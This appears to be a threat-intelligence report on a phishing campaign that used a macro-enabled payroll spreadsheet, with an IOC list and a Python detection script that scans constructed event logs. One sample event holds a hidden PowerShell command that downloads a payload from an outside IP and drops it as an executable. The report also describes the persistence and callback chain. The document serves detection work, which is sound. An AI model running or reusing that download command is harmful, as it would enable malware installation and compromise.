Phishing Email Delivering Macro-Enabled Spreadsheet for Payroll Fraud
ID: c7087ffb-3d66-4a52-a368-dd36399d4bf2
STIX ID: report--c7087ffb-3d66-4a52-a368-dd36399d4bf2
Threat Score: 70/100
On 13 April 2026, HR and payroll staff at a professional services firm were targeted by a phishing campaign delivering a macro-enabled spreadsheet (Salary_Adjustment_Q2_2026.xlsm) from hr-notifications@employeeportal-support.com. When macros were enabled, the document launched PowerShell to download an additional payload from http://194.5.249.201/files/update.dat, dropped C:\Users\Public\Libraries\cacheupd.exe, created a scheduled task named OfficeBackgroundSync, and initiated callbacks to 89.44.9.118.

Observed IOCs:
- Sender address: hr-notifications@employeeportal-support.com
- Attachment name: Salary_Adjustment_Q2_2026.xlsm
- Download URL: http://194.5.249.201/files/update.dat
- Callback IP: 89.44.9.118
- Scheduled task: OfficeBackgroundSync
- SHA256: 3b6e2df4b7d85d0d8ef1db4c99d13a4f4f18aeb6fc4a0d11c0c0f447a80c9912
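The chain above seen from the detection side, as an added example that is not part of the report: it checks constructed Sysmon/Windows Security-style events against the listed IOCs and also flags the parent-child behaviour (Excel spawning PowerShell), which keeps firing if the indicators change. The event shapes and field names are assumed simplifications of Sysmon event IDs 1, 3 and 11 and Security event 4698; the sample events are constructed, not real telemetry.

```python
IOCS = {  # indicators as listed in the report
    "download_url": "http://194.5.249.201/files/update.dat",
    "dropped_file": r"C:\Users\Public\Libraries\cacheupd.exe",
    "task_name": "OfficeBackgroundSync",
    "callback_ip": "89.44.9.118",
    "sha256": "3b6e2df4b7d85d0d8ef1db4c99d13a4f4f18aeb6fc4a0d11c0c0f447a80c9912",
}

# Constructed sample events in a simplified Sysmon / Windows Security shape (not real logs).
SAMPLE_EVENTS = [
    {"id": 1, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -c iwr http://194.5.249.201/files/update.dat "
                    r"-OutFile C:\Users\Public\Libraries\cacheupd.exe"},
    {"id": 11, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetFilename": r"C:\Users\Public\Libraries\cacheupd.exe",
     "Hashes": "SHA256=3b6e2df4b7d85d0d8ef1db4c99d13a4f4f18aeb6fc4a0d11c0c0f447a80c9912"},
    {"id": 4698, "TaskName": r"\OfficeBackgroundSync", "SubjectUserName": "jdoe"},
    {"id": 3, "Image": r"C:\Users\Public\Libraries\cacheupd.exe", "DestinationIp": "89.44.9.118"},
    {"id": 1, "ParentImage": r"C:\Windows\explorer.exe",  # benign: user opening a workbook
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "CommandLine": "EXCEL.EXE Budget.xlsx"},
]

def match_event(ev):
    """Return the indicator names an event matches; empty list when it is clean."""
    hits = []
    eid = ev.get("id")
    if eid == 1:  # process creation
        parent, image = ev.get("ParentImage", "").lower(), ev.get("Image", "").lower()
        if parent.endswith("excel.exe") and image.endswith("powershell.exe"):
            hits.append("office_spawned_powershell")  # behavioural, not IOC-bound
        if IOCS["download_url"] in ev.get("CommandLine", ""):
            hits.append("download_url")
    elif eid == 11:  # file creation
        if ev.get("TargetFilename", "").lower() == IOCS["dropped_file"].lower():
            hits.append("dropped_file")
        if IOCS["sha256"] in ev.get("Hashes", "").lower():
            hits.append("sha256")
    elif eid == 4698:  # scheduled task created (Security log); TaskName carries a leading backslash
        if ev.get("TaskName", "").lstrip("\\").lower() == IOCS["task_name"].lower():
            hits.append("task_name")
    elif eid == 3:  # network connection
        if ev.get("DestinationIp") == IOCS["callback_ip"]:
            hits.append("callback_ip")
    return hits

def scan_events(events):
    """Map each matching event's index to its hits so the full chain can be reconstructed."""
    return {i: h for i, ev in enumerate(events) if (h := match_event(ev))}
```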
